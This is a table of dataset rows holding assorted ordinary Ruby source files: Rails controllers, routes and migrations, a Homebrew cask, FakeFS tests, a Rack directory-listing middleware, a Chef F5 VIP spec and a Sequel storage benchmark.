hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
87b077cc9936e45fbbb59f887fd8163f66fc27f5 | 220 | cask :v1 => 'r-name' do
version :latest
sha256 :no_check
url 'http://www.jacek-dom.net/software/R-Name/R-Name.app.zip'
homepage 'http://www.jacek-dom.net/software/R-Name/'
license :gpl
app 'R-Name.app'
end
| 20 | 63 | 0.672727 |
f85000bbb810e26b0d77ba73758fb73304887b4c | 1,198 | # rubocop:disable Style/UnlessElse
class UsersController < ApplicationController
before_action :authenticate_request, except: %i[login register]
def index
render json: User.all
end
def login
authenticate params[:email], params[:password]
end
def test
render json: {
message: 'You have passed authentication and authorization test'
}
end
# POST /register
def register
@user = User.create(user_params)
if @user.save
response = { message: 'User created successfully' }
render json: response, status: :created
else
render json: @user.errors, status: :bad
end
end
private
def authenticate(email, password)
command = AuthenticateUser.new(email, password)
command = command.call
unless command[:authenticate_errors]
render json: {
access_token: command[:token],
user: command[:user],
message: 'Login Successful'
}
else
render json: { error: command[:authenticate_errors] }, status: :unauthorized
end
end
def user_params
params.permit(
:name,
:email,
:password,
:username
)
end
end
# rubocop:enable Style/UnlessElse
| 20.305085 | 82 | 0.657763 |
f7d99e0d099bc05df361e4b929106885765b8418 | 1,149 | require_relative 'test_helper'
# Kernel test class
class KernelTest < Minitest::Test
include FakeFS
def setup
FakeFS.deactivate!
end
def teardown
FakeFS.activate!
end
def test_can_exec_normally
out = open("|echo 'foo'")
assert_equal "foo\n", out.gets
end
def test_fake_kernel_can_create_subprocesses
FakeFS do
out = open("|echo 'foo'")
assert_equal "foo\n", out.gets
end
end
def test_fake_kernel_can_create_new_file
FakeFS do
FileUtils.mkdir_p '/path/to/'
open('/path/to/file', 'w') do |f|
f << 'test'
end
assert_kind_of FakeFile, FileSystem.fs['path']['to']['file']
end
end
def test_fake_kernel_can_do_stuff
FakeFS do
FileUtils.mkdir_p('/tmp')
File.open('/tmp/a', 'w+') { |f| f.puts 'test' }
begin
open('/tmp/a').read
rescue StandardError => e
raise e
end
end
end
def test_kernel_open_remains_private
refute 'foo'.respond_to?(:open), 'String#open should be private'
end
def test_can_exec_normally2
out = open("|echo 'foo'")
assert_equal "foo\n", out.gets
end
end
| 19.810345 | 68 | 0.635335 |
62093e075a6b01c15d58b3f1199e647143df77e0 | 309 | class ApplicationController < ActionController::Base
protect_from_forgery with: :exception
include SessionsHelper
private
# Confirms a logged-in user
def logged_in_user
unless logged_in?
store_location
flash[:danger] = "Please log in"
redirect_to login_url
end
end
end
| 19.3125 | 52 | 0.728155 |
bf5a097d75bea74469b7cefe83e285c47320af82 | 6,127 | module MesscadaApp
class ForceBinStaging < BaseService
attr_reader :repo, :delivery_repo, :locn_repo, :messcada_repo, :bin_number, :plant_resource_code, :presort_staging_run_id, :presort_staging_run_child_id, :bin, :staging_run
def initialize(bin_number, child_run_id)
@repo = RawMaterialsApp::PresortStagingRunRepo.new
@delivery_repo = RawMaterialsApp::RmtDeliveryRepo.new
@locn_repo = MasterfilesApp::LocationRepo.new
@messcada_repo = MesscadaApp::MesscadaRepo.new
@bin_number = bin_number
@presort_staging_run_child_id = child_run_id
@presort_staging_run_id = @repo.get(:presort_staging_run_children, :presort_staging_run_id, child_run_id)
@staging_run = repo.find_presort_staging_run_flat(@presort_staging_run_id)
@plant_resource_code = @staging_run[:plant_resource_code]
end
def call
errors = valid_bin?(bin_number)
return failed_response(errors.join(', ')) if errors
repo.transaction do
StageBins.call([bin_number], plant_resource_code, presort_staging_run_child_id)
success_response("Bin: #{bin_number} staged against run: #{presort_staging_run_id}, child: #{presort_staging_run_child_id} successfully")
end
rescue StandardError => e
failed_response(e.message)
end
private
def valid_bin?(asset_number) # rubocop:disable Metrics/AbcSize, Metrics/CyclomaticComplexity, Metrics/PerceivedComplexity
err = bin_exists?(asset_number)
return [err] unless err.nil?
errors = []
err = validate_location(asset_number)
errors << err unless err.nil?
check = messcada_repo.check_bin_in_wip(asset_number)
errors << check.message unless check.success
delivery_id = repo.get_value(:rmt_bins, :rmt_delivery_id, bin_asset_number: asset_number)
unless delivery_id.nil_or_empty?
res = QualityApp::FailedAndPendingMrlResults.call(delivery_id)
errors << res.message unless res.success
end
errs = valid_bin_for_active_parent_run?
errors += errs unless errs.nil?
err = rebin?(asset_number)
errors << err unless err.nil?
err = not_on_sale?(asset_number)
errors << err unless err.nil?
err = valid_bin_for_active_child_run?(asset_number)
errors << err unless err.nil?
errors unless errors.empty?
end
def rebin?(asset_number)
return "Bin: #{asset_number} is a rebin" if bin[:production_run_rebin_id]
end
def not_on_sale?(asset_number)
return "Bin: #{asset_number} is on sale" if bin[:bin_load_product_id]
end
def bin_exists?(asset_number)
@bin = repo.find_bin_record_by_asset_number(asset_number)
return "Bin:#{asset_number} does not exist" unless bin
return "Bin:#{asset_number} has been tipped" unless bin[:tipped_asset_number].nil_or_empty?
return "Bin:#{asset_number} has been shipped" unless bin[:shipped_asset_number].nil_or_empty?
end
def validate_location(asset_number)
AppConst::CR_RMT.invalid_presort_bin_staging_locations.each do |l|
locn_id = repo.get_value(:locations, :id, location_long_code: l)
return "Invalid bin location. Bin:#{asset_number} is from #{l}" if locn_repo.belongs_to_parent?(bin[:location_id], locn_id)
end
nil
end
def valid_bin_for_active_child_run?(asset_number)
run_farm_code = repo.child_run_farm(presort_staging_run_child_id)
bin_farm_code = repo.bin_farm(asset_number)
return "Bin:#{asset_number} belongs to farm [#{bin_farm_code}], but child_run's farm is [#{run_farm_code}]." unless bin_farm_code == run_farm_code || run_farm_code == '0P'
end
VALID_BIN_ERROR_MSG = '%s is %s on bin, but %s on run.'.freeze
def valid_bin_for_active_parent_run? # rubocop:disable Metrics/AbcSize, Metrics/CyclomaticComplexity, Metrics/PerceivedComplexity
errs = []
errs << format(VALID_BIN_ERROR_MSG, 'season_code', bin.season_code || 'blank', staging_run.season_code || 'blank') if bin.season_id != staging_run.season_id
errs << format(VALID_BIN_ERROR_MSG, 'cultivar_name', bin.cultivar_name || 'blank', staging_run.cultivar_name || 'blank') if bin.cultivar_id != staging_run.cultivar_id
errs << format(VALID_BIN_ERROR_MSG, 'colour', bin.colour_percentage || 'blank', staging_run.colour_percentage || 'blank') if staging_run.colour_percentage_id && bin.colour_percentage_id != staging_run.colour_percentage_id
errs << format(VALID_BIN_ERROR_MSG, 'cold_treatment_code', bin.actual_cold_treatment_code || 'blank', staging_run.actual_cold_treatment_code || 'blank') if staging_run.actual_cold_treatment_id && bin.actual_cold_treatment_id != staging_run.actual_cold_treatment_id
errs << format(VALID_BIN_ERROR_MSG, 'ripeness_treatment_code', bin.actual_ripeness_treatment_code || 'blank', staging_run.actual_ripeness_treatment_code || 'blank') if staging_run.actual_ripeness_treatment_id && bin.actual_ripeness_treatment_id != staging_run.actual_ripeness_treatment_id
errs << format(VALID_BIN_ERROR_MSG, 'rmt_code', bin.rmt_code || 'blank', staging_run.rmt_code || 'blank') if staging_run.rmt_code_id && bin.rmt_code_id != staging_run.rmt_code_id
errs << format(VALID_BIN_ERROR_MSG, 'rmt_class_code', bin.class_code || 'blank', staging_run.rmt_class_code || 'blank') if staging_run.rmt_class_id && bin.rmt_class_id != staging_run.rmt_class_id
errs << format(VALID_BIN_ERROR_MSG, 'size_code', bin.size_code || 'blank', staging_run.size_code || 'blank') if staging_run.rmt_size_id && bin.rmt_size_id != staging_run.rmt_size_id
errs << "bin location_code[#{bin.location_long_code}] is not in [#{AppConst::CR_RMT.valid_presort_bin_staging_locations.join(' ')}]" unless valid_bin_location_for_staging?
return errs unless errs.empty?
end
def valid_bin_location_for_staging?
AppConst::CR_RMT.valid_presort_bin_staging_locations.each do |l|
locn_id = repo.get_value(:locations, :id, location_long_code: l)
return true if locn_repo.belongs_to_parent?(bin[:location_id], locn_id)
end
false
end
end
end
| 51.923729 | 294 | 0.739187 |
d57c9d31d131ee79228df4b3531097e0fc7bffdd | 1,882 | # frozen_string_literal: true
require 'rake/tasklib'
require 'ansible-ruby'
require 'ansible/ruby/rake/task_util'
require 'ansible/ruby/rake/compile'
require 'ansible/ruby/rake/clean'
module Ansible
module Ruby
module Rake
class Execute < ::Rake::TaskLib
include TaskUtil
# :reek:Attribute - Rake DSL gets ugly if we don't use a block
attr_writer :playbooks
# :reek:Attribute - Rake DSL gets ugly if we don't use a block
attr_accessor :options
def initialize(parameters = :default)
name, deps = parse_params parameters
yield self if block_given?
raise 'You did not supply any playbooks!' unless playbooks.any?
deps ||= []
compile_task_name = "#{name}_compile".to_sym
deps = [*deps] << compile_task_name
playbook_yml_files = yaml_filenames playbooks
task name => deps do
flat = flat_options
flat += ' ' unless flat.empty?
sh "ansible-playbook #{flat}#{playbook_yml_files.join ' '}"
end
symbol = name.inspect.to_s
desc "Compiles YAML files for #{symbol} task"
compiled_files = playbooks + nested_files
Compile.new compile_task_name do |compile_task|
compile_task.files = compiled_files
end
desc "Cleans YAML files for #{symbol} task"
Clean.new "#{name}_clean".to_sym do |clean_task|
clean_task.files = compiled_files
end
end
private
def playbooks
[*@playbooks]
end
def nested_files
FileList['roles/*/tasks/**/*.rb',
'roles/*/handlers/**/*.rb']
end
def flat_options
array = [*options] << ENV['ANSIBLE_OPTS']
array.compact.join ' '
end
end
end
end
end
| 28.953846 | 73 | 0.587673 |
6a4ed6ba084d61f6e47d30552d5ceeaa7f86ceac | 1,382 | ActionController::Routing::Routes.draw do |map|
map.namespace :admin do |a|
a.resources :users, :collection => {:search => :post}
end
map.resources :profiles, :member=>{:delete_icon=>:post}, :collection=>{:search=>:get}, :has_many => [:friends, :blogs, :photos, :comments, :feed_items, :messages] do |profiles|
profiles.resources :videos, :collection => {:wall => :post}, :member => {:converted => :post}
end
map.resources :messages, :collection => {:sent => :get}
map.resources :blogs do |blog|
blog.resources :comments
end
map.resources :forums, :collection => {:update_positions => :post} do |forum|
forum.resources :topics, :controller => :forum_topics do |topic|
topic.resources :posts, :controller => :forum_posts
end
end
map.with_options(:controller => 'accounts') do |accounts|
accounts.login "/login", :action => 'login'
accounts.logout "/logout", :action => 'logout'
accounts.signup "/signup", :action => 'signup'
end
map.with_options(:controller => 'home') do |home|
home.home '/', :action => 'index'
home.latest_comments '/latest_comments.rss', :action => 'latest_comments', :format=>'rss'
home.newest_members '/newest_members.rss', :action => 'newest_members', :format=>'rss'
home.tos '/tos', :action => 'terms'
home.contact '/contact', :action => 'contact'
end
end
| 37.351351 | 178 | 0.649059 |
03915be6996ffa215e9af74b4b28c2ceeebf4101 | 110 | $LOAD_PATH.unshift File.expand_path("../../lib", __FILE__)
require "nanoboxifier"
require "minitest/autorun"
| 22 | 58 | 0.754545 |
ab02bfd5c22e237fdbc5ad09d75c6fa2f8fa603a | 157 | class CreateCarts < ActiveRecord::Migration
def change
create_table :carts do |t|
t.integer :store_id
t.integer :user_id
end
end
end
| 17.444444 | 43 | 0.675159 |
f80a6b8b56cb4332d24748c6dbd57d4468b0b0ce | 1,923 | require 'spec_helper'
require 'dea/utils/upload'
describe Upload do
let(:file_to_upload) do
file_to_upload = Tempfile.new("file_to_upload")
file_to_upload << "This is the file contents"
file_to_upload.close
file_to_upload
end
subject { Upload.new(file_to_upload.path, "http://127.0.0.1:12345/") }
describe "#upload!" do
around do |example|
em { example.call }
end
context "when uploading successfully" do
it "uploads a file" do
uploaded_contents = ""
start_http_server(12345) do |connection, data|
uploaded_contents << data
connection.send_data("HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n")
end
subject.upload! do |error|
error.should be_nil
uploaded_contents.should match(/.*multipart-boundary-.*Content-Disposition.*This is the file contents.*multipart-boundary-.*/m)
done
end
end
end
context "when there is no server running" do
it "calls the block with the exception" do
subject.upload! do |error|
error.should be_a(Upload::UploadError)
error.message.should == "Error uploading: http://127.0.0.1:12345/ (Response status: unknown)"
done
end
end
end
context "when you get a 500" do
it "calls the block with the exception" do
start_http_server(12345) do |connection, data|
body = ""
connection.send_data("HTTP/1.1 500\r\n")
connection.send_data("Content-Length: #{body.length}\r\n")
connection.send_data("\r\n")
connection.send_data(body)
connection.send_data("\r\n")
end
subject.upload! do |error|
error.should be_a(Upload::UploadError)
error.message.should match %r{Error uploading: http://127.0.0.1:12345/ \(HTTP status: 500}
done
end
end
end
end
end
| 29.584615 | 137 | 0.618305 |
79ac55c195c42d9782b98e6e498775c6775f60a8 | 1,784 | class Spa < ApplicationRecord
has_many :technicians, :dependent => :delete_all
has_many :treatments
has_many :appointments, :through => :treatments
validates :name, :presence => true
validates :phone_number, :presence => true
scope :by_zipcode, -> (zipcode) { where("zip = ?", zipcode)}
def available_timeslots
available_times = []
half_hours_array = datetime_array_for_each_working_half_hour
half_hours_array.each_with_index do |half_hours, index|
if self.appointments.find_by(appointment_time: half_hours)
elsif appointment = self.appointments.find_by(appointment_time: half_hours_array[index-1])
if appointment.treatment.duration == 60
else
available_times << data_for_datetime_array(half_hours)
end
else
available_times << data_for_datetime_array(half_hours)
end
end
available_times
end
private
def datetime_array_for_next_seven_days_at_midnight
days_array = []
day_counter = 1
7.times do
days_array << (Time.now + day_counter.days).at_midnight
day_counter += 1
end
days_array
end
def datetime_array_for_each_working_half_hour
half_hours_array = []
datetime_array_for_next_seven_days_at_midnight.each do |day|
half_hour_counter = 9.to_f
17.times do
half_hours_array << (day + half_hour_counter.hours)
half_hour_counter += 0.5
end
end
half_hours_array
end
def data_for_datetime_array(half_hours)
[half_hours.strftime("%A, %B %e, %Y - %l:%M %P"), half_hours]
end
end
| 31.857143 | 102 | 0.622758 |
0366eff141b363134c4ebb847fef221e0424c1e6 | 4,306 | require 'time'
require 'rack/utils'
require 'rack/mime'
module Rack
# Rack::Directory serves entries below the +root+ given, according to the
# path info of the Rack request. If a directory is found, the file's contents
# will be presented in an html based index. If a file is found, the env will
# be passed to the specified +app+.
#
# If +app+ is not specified, a Rack::File of the same +root+ will be used.
class Directory
DIR_FILE = "<tr><td class='name'><a href='%s'>%s</a></td><td class='size'>%s</td><td class='type'>%s</td><td class='mtime'>%s</td></tr>"
DIR_PAGE = <<-PAGE
<html><head>
<title>%s</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<style type='text/css'>
table { width:100%%; }
.name { text-align:left; }
.size, .mtime { text-align:right; }
.type { width:11em; }
.mtime { width:15em; }
</style>
</head><body>
<h1>%s</h1>
<hr />
<table>
<tr>
<th class='name'>Name</th>
<th class='size'>Size</th>
<th class='type'>Type</th>
<th class='mtime'>Last Modified</th>
</tr>
%s
</table>
<hr />
</body></html>
PAGE
attr_reader :files
attr_accessor :root, :path
def initialize(root, app=nil)
@root = F.expand_path(root)
@app = app || Rack::File.new(@root)
end
def call(env)
dup._call(env)
end
F = ::File
def _call(env)
@env = env
@script_name = env[SCRIPT_NAME]
@path_info = Utils.unescape(env[PATH_INFO])
if forbidden = check_forbidden
forbidden
else
@path = F.join(@root, @path_info)
list_path
end
end
def check_forbidden
return unless @path_info.include? ".."
body = "Forbidden\n"
size = Rack::Utils.bytesize(body)
return [403, {"Content-Type" => "text/plain",
CONTENT_LENGTH => size.to_s,
"X-Cascade" => "pass"}, [body]]
end
def list_directory
@files = [['../','Parent Directory','','','']]
url_head = (@script_name.split('/') + @path_info.split('/')).map do |part|
Rack::Utils.escape part
end
Dir.entries(path).reject { |e| e.start_with?('.') }.sort.each do |node|
stat = stat(node)
next unless stat
basename = F.basename(node)
ext = F.extname(node)
url = F.join(*url_head + [Rack::Utils.escape(basename)])
size = stat.size
type = stat.directory? ? 'directory' : Mime.mime_type(ext)
size = stat.directory? ? '-' : filesize_format(size)
mtime = stat.mtime.httpdate
url << '/' if stat.directory?
basename << '/' if stat.directory?
@files << [ url, basename, size, type, mtime ]
end
return [ 200, { CONTENT_TYPE =>'text/html; charset=utf-8'}, self ]
end
def stat(node, max = 10)
F.stat(node)
rescue Errno::ENOENT, Errno::ELOOP
return nil
end
# TODO: add correct response if not readable, not sure if 404 is the best
# option
def list_path
@stat = F.stat(@path)
if @stat.readable?
return @app.call(@env) if @stat.file?
return list_directory if @stat.directory?
else
raise Errno::ENOENT, 'No such file or directory'
end
rescue Errno::ENOENT, Errno::ELOOP
return entity_not_found
end
def entity_not_found
body = "Entity not found: #{@path_info}\n"
size = Rack::Utils.bytesize(body)
return [404, {"Content-Type" => "text/plain",
CONTENT_LENGTH => size.to_s,
"X-Cascade" => "pass"}, [body]]
end
def each
show_path = Rack::Utils.escape_html(@path.sub(/^#{@root}/,''))
files = @files.map{|f| DIR_FILE % DIR_FILE_escape(*f) }*"\n"
page = DIR_PAGE % [ show_path, show_path , files ]
page.each_line{|l| yield l }
end
# Stolen from Ramaze
FILESIZE_FORMAT = [
['%.1fT', 1 << 40],
['%.1fG', 1 << 30],
['%.1fM', 1 << 20],
['%.1fK', 1 << 10],
]
def filesize_format(int)
FILESIZE_FORMAT.each do |format, size|
return format % (int.to_f / size) if int >= size
end
int.to_s + 'B'
end
private
# Assumes url is already escaped.
def DIR_FILE_escape url, *html
[url, *html.map { |e| Utils.escape_html(e) }]
end
end
end
| 25.784431 | 140 | 0.574779 |
182c35596445eae0085836795a67eec0982865e6 | 287 | cask 'inc' do
version :latest
sha256 :no_check
# amazonaws.com is the official download host per the vendor homepage
url 'http://inc-static.kippt.com.s3.amazonaws.com/apps/inc-osx.zip'
name 'Inc'
homepage 'https://sendtoinc.com/apps/'
license :gratis
app 'Inc.app'
end
| 22.076923 | 71 | 0.714286 |
ac1f1a620d2552a87d3d20a36770c9b14503999e | 2,573 | require 'fog'
module Muggy
module Fog
include Muggy::Support::Memoisation
extend self
# assumptions: Muggy.use_iam? is defined
# reset service instances.
# Used to reset memoised values if the global region's changed.
def reset_services!
%w{
auto_scaling
cache
cfn
cw
ec2
elb
iam
rds
r53
s3
}.each do |key|
clear_memoised_value!(key)
end
end
# services
memoised :ec2
def ec2!
ec2_for_region(Muggy.region)
end
def ec2_for_region(region)
::Fog::Compute.new(provider: 'AWS', region: Muggy.formal_region(region), use_iam_profile: Muggy.use_iam?)
end
memoised :elb
def elb!
elb_for_region(Muggy.region)
end
def elb_for_region(region)
::Fog::AWS::ELB.new(region: Muggy.formal_region(region), use_iam_profile: Muggy.use_iam?)
end
memoised :cache
def cache!
cache_for_region(Muggy.region)
end
def cache_for_region(region)
::Fog::AWS::Elasticache.new(region: Muggy.formal_region(region), use_iam_profile: Muggy.use_iam?)
end
memoised :cfn
def cfn!
cfn_for_region(Muggy.region)
end
def cfn_for_region(region)
::Fog::AWS::CloudFormation.new(region: Muggy.formal_region(region), use_iam_profile: Muggy.use_iam?)
end
memoised :s3
def s3!
s3_for_region(Muggy.region)
end
def s3_for_region(region)
::Fog::Storage.new(provider: 'AWS', region: Muggy.formal_region(region), use_iam_profile: Muggy.use_iam?)
end
memoised :cw
def cw!
cloudwatch_for_region(Muggy.region)
end
def cloudwatch_for_region(region)
::Fog::AWS::CloudWatch.new(region: Muggy.formal_region(region), use_iam_profile: Muggy.use_iam?)
end
memoised :rds
def rds!
rds_for_region(Muggy.region)
end
def rds_for_region(region)
::Fog::AWS::RDS.new(region: Muggy.formal_region(region), use_iam_profile: Muggy.use_iam?)
end
memoised :auto_scaling
def auto_scaling!
auto_scaling_for_region(Muggy.region)
end
def auto_scaling_for_region(region)
::Fog::AWS::AutoScaling.new(region: Muggy.formal_region(region), use_iam_profile: Muggy.use_iam?)
end
#################
# region free #
#################
memoised :r53
def r53!
::Fog::DNS.new(provider: 'AWS', use_iam_profile: Muggy.use_iam?)
end
memoised :iam
def iam!
::Fog::AWS::IAM.new()
end
end
end
| 19.792308 | 111 | 0.630004 |
acba9cd6f7085ccc70e5173d50aa7c261befa04c | 3,537 | require 'spec_helper'
require 'f5/icontrol'
require_relative '../../../libraries/vip'
require_relative '../../../libraries/credentials'
require_relative '../../../libraries/dns_lookup'
require_relative '../../../libraries/gem_helper'
describe 'f5_test::test_create_vip_name' do
let(:api) { double('F5::Icontrol') }
let(:server_api) { double('F5::Icontrol::LocalLB::VirtualServer') }
let(:chef_run) do
ChefSpec::SoloRunner.new(
platform: 'centos',
version: '7.2.1511',
step_into: ['f5_vip']
) do |node|
node.normal[:f5][:credentials][:default] = {
host: '1.2.3.4',
username: 'api',
password: 'testing'
}
end.converge(described_recipe)
end
before do
allow(F5::Icontrol::API).to receive(:new) { api }
allow(api)
.to receive_message_chain('LocalLB.VirtualServer') { server_api }
allow_any_instance_of(Chef::RunContext::CookbookCompiler)
.to receive(:compile_libraries).and_return(true)
stub_data_bag_item('f5', 'default')
.and_return(host: '1.2.3.4', username: 'api', password: 'testing')
allow(server_api).to receive(:get_rule).and_return({item: {}})
allow(server_api).to receive(:get_destination_v2) {
{ item: { address: '86.75.30.9', port: '80' } }
}
end
context 'when managing the vip' do
before do
# these vips have no profiles
allow(server_api).to receive(:get_profile) {
{ item: { item: [] } }
}
# these vips have their SAT set to None
allow(server_api)
.to receive(:get_source_address_translation_type) {
{ item: [
F5::Icontrol::LocalLB::VirtualServer::SourceAddressTranslationType::SRC_TRANS_NONE
]}}
end
context 'and the name hasnt been created yet' do
it 'skips all the work' do
allow_any_instance_of(DNSLookup)
.to receive(:address).and_return(nil)
expect(server_api).to_not receive(:create)
chef_run
end
end
context 'and the vip does not exist' do
before do
allow(server_api).to receive(:get_list) {
{ item: [] }
}
end
it 'creates the vip' do
allow_any_instance_of(ChefF5::VIP)
.to receive(:vip_default_pool).and_return('reallybasic')
allow_any_instance_of(DNSLookup)
.to receive(:address).and_return('90.2.1.0')
allow(server_api).to receive(:get_destination_v2) {
{ item: { address: '90.2.1.0', port: '80' } }
}
expect(server_api).to receive(:create) do |args|
expect(args[:definitions][:item][:address]).to eq '90.2.1.0'
end
expect(server_api).to receive(:set_type)
expect(chef_run).to create_f5_vip('myvip').with(
address: 'github.com',
port: '80',
protocol: 'PROTOCOL_TCP',
pool: 'reallybasic'
)
end
end
context 'and the vip already exists' do
before do
allow(server_api).to receive(:get_list) {
{ item: ['/Common/myvip'] }
}
allow_any_instance_of(DNSLookup)
.to receive(:address).and_return('90.2.1.0')
allow(server_api).to receive(:get_destination_v2) {
{ item: { address: '90.2.1.0', port: '80' } }
}
end
it 'does not create the vip' do
allow_any_instance_of(ChefF5::VIP).to receive(:vip_default_pool)
allow_any_instance_of(ChefF5::VIP).to receive(:set_vip_pool)
chef_run
end
end
end
end
| 28.756098 | 96 | 0.60475 |
ac977c7361f0199150789dec21aecf7224fdc879 | 3,860 | class SubmissionRule < ActiveRecord::Base
class InvalidRuleType < Exception
def initialize(rule_name)
super I18n.t('assignment.not_valid_submission_rule', type: rule_name)
end
end
belongs_to :assignment, inverse_of: :submission_rule
has_many :periods, -> { order('id') }, dependent: :destroy
accepts_nested_attributes_for :periods, allow_destroy: true
# validates_associated :assignment
# validates_presence_of :assignment
def self.descendants
[NoLateSubmissionRule,
PenaltyPeriodSubmissionRule,
PenaltyDecayPeriodSubmissionRule,
GracePeriodSubmissionRule]
end
def can_collect_now?
return @can_collect_now if !@can_collect_now.nil?
@can_collect_now = Time.zone.now >= get_collection_time
end
def can_collect_grouping_now?(grouping)
Time.zone.now >= calculate_grouping_collection_time(grouping)
end
# Cache that allows us to quickly get collection time
def get_collection_time
return @get_collection_time if !@get_collection_time.nil?
@get_collection_time = calculate_collection_time
end
def calculate_collection_time
assignment.latest_due_date + hours_sum.hours
end
def calculate_grouping_collection_time(grouping)
if grouping.inviter.section
SectionDueDate.due_date_for(grouping.inviter.section,
assignment)
else
assignment.due_date + hours_sum.hours
end
end
# When Students commit code after the collection time, MarkUs should warn
# the Students with a message saying that the due date has passed, and the
# work they're submitting will probably not be graded
def commit_after_collection_message
#I18n.t 'submission_rules.submission_rule.commit_after_collection_message'
raise NotImplementedError.new('SubmissionRule: commit_after_collection_message not implemented')
end
# When Students view the File Manager after the collection time,
# MarkUs should warnthe Students with a message saying that the
# due date has passed, and that any work they're submitting will
# probably not be graded
def after_collection_message
raise NotImplementedError.new('SubmissionRule: after_collection_message not implemented')
end
# When we're past the due date, the File Manager for the students will display
# a message to tell them that they're currently past the due date.
def overtime_message
raise NotImplementedError.new('SubmissionRule: overtime_message not implemented')
end
# Returns true or false based on whether the attached Assignment's properties
# will work with this particular SubmissionRule
def assignment_valid?
raise NotImplementedError.new('SubmissionRule: assignment_valid? not implemented')
end
# Takes a Submission (with an attached Result), and based on the properties of
# this SubmissionRule, applies penalties to the Result - for example, will
# add an ExtraMark of a negative value, or perhaps add the use of a Grace Day.
def apply_submission_rule(submission)
raise NotImplementedError.new('SubmissionRule: apply_submission_rule not implemented')
end
def description_of_rule
raise NotImplementedError.new('SubmissionRule: description_of_rule not implemented')
end
def grader_tab_partial(grouping)
raise NotImplementedError.new('SubmissionRule: render_grader_tab not implemented')
end
def reset_collection_time
@get_collection_time = nil
@can_collect_now = nil
end
private
# Over time hours could be a fraction. This is mostly used for testing
def calculate_overtime_hours_from(from_time)
overtime_hours = (from_time - assignment.due_date) / 1.hour
# If the overtime is less than 0, that means it was submitted early, so
# just return 0 - otherwise, return overtime_hours.
[0, overtime_hours].max
end
def hours_sum
0
end
end
| 33.859649 | 101 | 0.764249 |
d5f97bca6d03d375bfd40e9ee9f5c9ab1763940b | 5,122 | require 'sequel'
require 'benchmark'
DB = Sequel.connect ARGV[0]
DB.create_table! :languages1 do
primary_key :id
varchar :name, :size => 16, :unique => true
varchar :plural, :size => 128
end
DB.create_table! :translations1 do
primary_key [:language_id, :msgid_hash, :msgstr_index]
foreign_key :language_id, :languages1, :null => false
integer :msgid_hash, :null => false
text :msgstr, :null => false
integer :msgstr_index
end
DB.create_table! :languages2 do
primary_key :id
varchar :name, :size => 16, :unique => true
varchar :plural, :size => 128
end
DB.create_table! :translations2 do
primary_key [:language_id, :msgid, :msgstr_index]
foreign_key :language_id, :languages2, :null => false
text :msgid, :null => false
text :msgstr, :null => false
integer :msgstr_index
end
DB.create_table! :languages3 do
primary_key :id
varchar :name, :size => 16, :unique => true
varchar :plural, :size => 128
end
drop_table :original3 rescue nil
DB << "CREATE TABLE original3 (id INTEGER PRIMARY KEY, msgid TEXT)"
DB.create_table! :translations3 do
primary_key [:language_id, :original_id, :msgstr_index]
foreign_key :language_id, :languages3, :null => false
foreign_key :original_id, :original3, :null => false
text :msgstr, :null => false
integer :msgstr_index
end
$chars = ('a'..'z').to_a + ('A'..'Z').to_a + ('0'..'9').to_a
def rand_string size
(0...size).collect { $chars[Kernel.rand($chars.length)] }.join
end
$original = []
128.times { $original << rand_string(32) }
$original.sort!.uniq!
$translations = {}
$plurals = {}
3.times do
lang_name = rand_string(2)
$translations[lang_name] = lang = {}
$plurals[lang_name] = rand_string(8)
$original.each do |orig|
lang[orig] = rand_string(32)
end
end
$languages = $plurals.keys
def rand_language
$languages[Kernel.rand($languages.length)]
end
def rand_original
$original[Kernel.rand($original.length)]
end
puts 'Export'
Benchmark.bm(22) do |bm|
bm.report('Original 0.0.3:') do
$translations.each do |lang, trans|
lang_id = (DB[:languages1] << {:name => lang, :plural => $plurals[lang]})
trans.each do |original, translation|
DB[:translations1] << {
:language_id => lang_id,
:msgid_hash => original.hash,
:msgstr => translation
}
end
end
end
bm.report('With string inside:') do
$translations.each do |lang, trans|
lang_id = (DB[:languages2] << {:name => lang, :plural => $plurals[lang]})
trans.each do |original, translation|
DB[:translations2] << {
:language_id => lang_id,
:msgid => original,
:msgstr => translation
}
end
end
end
bm.report('With separate strings:') do
$original.each do |original|
DB[:original3] << {:id => original.hash, :msgid => original}
end
$translations.each do |lang, trans|
lang_id = (DB[:languages3] << {:name => lang, :plural => $plurals[lang]})
trans.each do |original, translation|
DB[:translations3] << {
:language_id => lang_id,
:original_id => original.hash,
:msgstr => translation
}
end
end
end
end
$search = (0...1024).collect {[rand_language, rand_original]}
puts ''
puts 'Searching'
Benchmark.bm(22) do |bm|
bm.report('Original 0.0.3:') do
$search.each do |arr|
_lang, _orig = *arr
lang = DB[:languages1].filter(:name => _lang).first[:id]
trans = DB[:translations1].filter(:language_id => lang,
:msgid_hash => _orig.hash,
:msgstr_index => nil).first[:msgstr]
end
end
bm.report('With string inside:') do
$search.each do |arr|
_lang, _orig = *arr
lang = DB[:languages2].filter(:name => _lang).first[:id]
trans = DB[:translations2].filter(:language_id => lang,
:msgid => _orig,
:msgstr_index => nil).first[:msgstr]
end
end
bm.report('With separate strings:') do
$search.each do |arr|
_lang, _orig = *arr
lang = DB[:languages3].filter(:name => _lang).first[:id]
trans = DB[:translations3].filter(:language_id => lang,
:original_id => _orig.hash,
:msgstr_index => nil).first[:msgstr]
end
end
end
puts ''
puts 'Import'
Benchmark.bm(22) do |bm|
bm.report('With string inside:') do
DB[:languages2].each do |lang|
DB[:translations2].each do |trans|
[lang[:name], trans[:msgid], trans[:msgstr], trans[:msgstr_index]]
end
end
end
bm.report('With separate strings:') do
DB[:languages3].each do |lang|
DB[:translations3].each do |trans|
orig = DB[:original3].filter(:id => trans[:original_id]).first[:msgid]
[lang[:name], orig, trans[:msgstr], trans[:msgstr_index]]
end
end
end
end
| 29.268571 | 79 | 0.588832 |
e9f849b5240d4348db712d520da3f85476889ad1 | 274 | require 'rails_helper'
RSpec.describe Identifier, type: :model do
let(:identifier) { create :identifier }
describe 'the code' do
it 'should be unique' do
iden2 = Identifier.new(code: identifier.code)
expect(iden2.valid?).to be_falsey
end
end
end
| 21.076923 | 51 | 0.689781 |
38227ac2e7193512405779ebca5d4c650702ec3a | 88 | # frozen_string_literal: true
class Task < ApplicationRecord
belongs_to :project
end
| 14.666667 | 30 | 0.806818 |
